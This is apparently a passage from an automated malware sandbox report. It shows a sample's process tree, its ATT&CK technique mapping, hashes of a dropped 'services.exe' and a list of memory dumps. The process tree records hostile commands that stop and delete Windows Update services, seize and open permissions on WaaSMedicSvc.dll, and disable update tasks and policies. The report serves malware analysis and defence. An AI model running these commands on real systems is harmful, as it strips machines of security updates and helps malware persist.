"\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:2180

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
PID:3036

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
PID:860

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:2640

C:\Windows\system32\sc.exe
sc stop bits
4⤵
PID:540

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
PID:3160

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:500

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:420

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies registry key
PID:2120

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:3472

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:2288

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3708

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2396

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2196

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2128

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1524

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3644

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:2608

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:3788

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:2600

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:752

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1212

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:2964

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:3412

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
PID:940

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "jgimrcmwq"
4⤵
PID:2116

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

2

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows\services.exe
Filesize
5.3MB

MD5
52fdd7f3ed1b50bc5794983a37cb4064

SHA1
4a185751e9e94dccb3330ca79f893de7ca080482

SHA256
e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2

SHA512
4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f

Download Submit
C:\Program Files\Windows\services.exe
Filesize
5.3MB

MD5
52fdd7f3ed1b50bc5794983a37cb4064

SHA1
4a185751e9e94dccb3330ca79f893de7ca080482

SHA256
e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2

SHA512
4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize
539B

MD5
84f2160705ac9a032c002f966498ef74

SHA1
e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

SHA256
7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

SHA512
f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

Download Submit
memory/160-178-0x0000000000000000-mapping.dmp

Download
memory/308-177-0x0000000000000000-mapping.dmp

Download
memory/420-365-0x0000000000000000-mapping.dmp

Download
memory/420-173-0x0000000000000000-mapping.dmp

Download
memory/492-172-0x0000000000000000-mapping.dmp

Download
memory/500-221-0x0000000000000000-mapping.dmp

Download
memory/500-364-0x0000000000000000-mapping.dmp

Download
memory/540-169-0x0000000000000000-mapping.dmp

Download
memory/540-219-0x0000000000000000-mapping.dmp

Download
memory/540-361-0x0000000000000000-mapping.dmp

Download
memory/752-386-0x0000000000000000-mapping.dmp

Download
memory/860-359-0x0000000000000000-mapping.dmp

Download
memory/940-366-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/940-367-0x0000000000401BEA-mapping.dmp

Download
memory/940-372-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1144-168-0x0000000000000000-mapping.dmp

Download
memory/1172-175-0x0000000000000000-mapping.dmp

Download
memory/1212-185-0x0000000000000000-mapping.dmp

Download
memory/1212-387-0x0000000000000000-mapping.dmp

Download
memory/1280-180-0x0000000000000000-mapping.dmp

Download
memory/1524-381-0x0000000000000000-mapping.dmp

Download
memory/1580-200-0x0000000000000000-mapping.dmp

Download
memory/1604-188-0x0000000000400000-0x0000000000C91000-memory.dmp

Filesize
8.6MB

Download
memory/1780-117-0x0000000000400000-0x0000000000C91000-memory.dmp

Filesize
8.6MB

Download
memory/1852-124-0x00000273F98A0000-0x00000273F9A7C000-memory.dmp

Filesize
1.9MB

Download
memory/1852-123-0x00000273F6D70000-0x00000273F6F4D000-memory.dmp

Filesize
1.9MB

Download
memory/2116-395-0x000002336A5D0000-0x000002336A5D6000-memory.dmp

Filesize
24KB

Download
memory/2116-397-0x0000023369EA0000-0x0000023369EA7000-memory.dmp

Filesize
28KB

Download
memory/2120-368-0x0000000000000000-mapping.dmp

Download
memory/2120-174-0x0000000000000000-mapping.dmp

Download
memory/2128-380-0x0000000000000000-mapping.dmp

Download
memory/2180-214-0x0000000000000000-mapping.dmp

Download
memory/2180-357-0x0000000000000000-mapping.dmp

Download
memory/2196-379-0x0000000000000000-mapping.dmp

Download
memory/2212-170-0x0000000000000000-mapping.dmp

Download
memory/2268-179-0x0000000000000000-mapping.dmp

Download
memory/2288-374-0x0000000000000000-mapping.dmp

Download
memory/2372-233-0x0000016678970000-0x0000016678A29000-memory.dmp

Filesize
740KB

Download
memory/2372-227-0x0000016678790000-0x00000166787AC000-memory.dmp

Filesize
112KB

Download
memory/2372-266-0x0000016678780000-0x000001667878A000-memory.dmp

Filesize
40KB

Download
memory/2372-201-0x0000000000000000-mapping.dmp

Download
memory/2396-377-0x0000000000000000-mapping.dmp

Download
memory/2404-212-0x0000000000000000-mapping.dmp

Download
memory/2600-385-0x0000000000000000-mapping.dmp

Download
memory/2608-383-0x0000000000000000-mapping.dmp

Download
memory/2640-218-0x0000000000000000-mapping.dmp

Download
memory/2640-360-0x0000000000000000-mapping.dmp

Download
memory/2900-181-0x0000000000000000-mapping.dmp

Download
memory/2948-183-0x0000000000000000-mapping.dmp

Download
memory/2964-388-0x0000000000000000-mapping.dmp

Download
memory/3036-358-0x0000000000000000-mapping.dmp

Download
memory/3160-171-0x0000000000000000-mapping.dmp

Download
memory/3160-362-0x0000000000000000-mapping.dmp

Download
memory/3412-389-0x0000000000000000-mapping.dmp

Download
memory/3472-373-0x0000000000000000-mapping.dmp

Download
memory/3472-176-0x0000000000000000-mapping.dmp

Download
memory/3644-382-0x0000000000000000-mapping.dmp

Download
memory/3656-215-0x0000000000000000-mapping.dmp

Download
memory/3660-213-0x0000000000000000-mapping.dmp

Download
memory/3684-217-0x0000000000000000-mapping.dmp

Download
memory/3708-375-0x0000000000000000-mapping.dmp

Download
memory/3720-182-0x0000000000000000-mapping.dmp

Download
memory/3752-222-0x0000000000000000-mapping.dmp

Download
memory/3788-384-0x0000000000000000-mapping.dmp

Download
memory/3836-376-0x000002C0CA910000-0x000002C0CA922000-memory.dmp

Filesize
72KB

Download
memory/3836-363-0x000002C0CA5C0000-0x000002C0CA5C6000-memory.dmp

Filesize
24KB

Download
memory/3864-220-0x0000000000000000-mapping.dmp

Download
memory/3880-216-0x0000000000000000-mapping.dmp

Download
memory/3944-132-0x0000000000000000-mapping.dmp

Download
memory/3944-137-0x000001BD6A0B0000-0x000001BD6A0D2000-memory.dmp

Filesize
136KB

Download
memory/3944-140-0x000001BD6A260000-0x000001BD6A2D6000-memory.dmp

Filesize
472KB

Download
memory/4012-131-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads